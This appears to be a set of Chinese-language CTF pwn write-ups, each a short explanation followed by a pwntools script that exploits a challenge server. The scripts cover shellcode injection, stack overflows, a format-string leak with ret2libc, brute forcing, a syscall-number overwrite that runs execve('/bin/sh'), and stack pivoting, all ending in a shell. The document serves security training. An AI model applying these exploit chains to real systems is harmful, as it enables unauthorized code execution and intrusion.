ez_shellcode
简单的shellcode
from pwn import*
context.arch='amd64'
io=remote('nc1.ctfplus.cn',39373)
shellcode_addr=0x0401256
shellcode=asm(shellcraft.sh())
io.send(shellcode)
payload=cyclic(0x18+8)+p64(shellcode_addr)
io.sendline(payload)
io.interactive()
|
你会栈溢出吗?
简单的64位栈溢出,注意堆栈平衡
from pwn import*
io=remote('nc1.ctfplus.cn',23262)
ret=0x040057e
payload=cyclic(0xC+8)+p64(ret)+p64(0x400728)
io.sendline(payload)
io.interactive()
|
买黑吗喽了么
一道菜单题,输入1进入购买,输入2查看余额,输入3写反馈。
不断进行购买至负数,然后余额就会变成非常大的正数,就能输入%p泄漏基址,接着进入反馈函数打ret2libc
from pwn import*
context.arch='amd64'
elf=ELF('./syscall')
libc=ELF('./syscalllibc.so.6')
io=remote('nc1.ctfplus.cn',35338)
for _ in range(9):
io.sendlineafter(b"choice:",b"1")
io.sendlineafter(b"choice:",b"1")
io.sendlineafter(b"choice:",b"1")
io.sendlineafter(b"choice:",b"2")
io.sendlineafter(b"choice:",b"2")
io.send(b"%p")
io.recvuntil(b"0x0x")
base=int(io.recv(12),16)-0x4090
print(hex(base))
rdi=base+0x11f1
ret=base+0x101a
puts_plt=base+elf.plt['puts']
puts_got=base+elf.got['puts']
io.sendlineafter(b"choice:",b"3")
payload=cyclic(0x50+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(base+0x14BC)
io.sendlineafter(b"feedback:",payload)
puts=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search('/bin/sh\x00'))
payload=cyclic(0x50+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)+p64(0)
io.sendline(payload)
io.interactive()
|
简单的签到
简答的计算,接收两个数并进行计算即可。
from pwn import*
io=remote('nc1.ctfplus.cn',31333)
io.sendafter(b"challenge.",b"\n")
v2=int(io.recvuntil("*",drop=True))
v3=int(io.recvuntil("=",drop=True))
v4=v2*v3
io.sendline(str(v4))
io.interactive()
|
00000
输入的密码与程序随机生成的密码一致则获得flag,写脚本爆破即可。
from pwn import *
filename = './00000'
context(arch = 'amd64', log_level = 'debug', os = 'linux')
for i in range(256):
io = remote('nc1.ctfplus.cn',26368)
try:
io.sendline(b'\x00')
io.recvuntil('{', timeout = 0.3)
io.interactive()
except:
continue
finally:
io.close()
|
over_flow??
存在一个函数,输入的filename会溢出一个字节可以修改open_fd
存在系统调用,修改open_fd的值为想要调用的系统调用号,比如修改为0x3b,进行execve(‘/bin/sh’,0,0),而filename作为第一个参数,因此可以输入/bin/sh
from pwn import*
io=remote('nc1.ctfplus.cn',26196)
io.sendline(b'2')
payload=b'/bin/sh\x00'+b'\x3b'
io.sendline(payload)
io.interactive()
|
这里的空间有点小啊
打栈迁移。
from pwn import*
context.arch='amd64'
elf=ELF('./zhanqianyi')
libc=ELF('./zhanqianyilibc.so.6')
io=remote('nc1.ctfplus.cn',34571)
bss=0x0601530
read=0x040071C
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
leave=0x0400738
rdi=0x0400853
ret=0x0400566
io.sendlineafter(b">>\n",b'1')
payload=b'a'*(0x30)+p64(bss)+p64(read)
io.sendafter('something\n',payload)
payload=p64(bss+0x100)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(read)+b'/bin/sh\x00'+p64(bss-0x30)+p64(leave)
io.send(payload)
puts=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
bin_sh=bss-0x30+0x28
payload=p64(bss+0x50)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)+p64(0)+p64(bss+0x100-0x30)+p64(leave)
io.sendline(payload)
io.interactive()
|
Black_Myth_Wukong
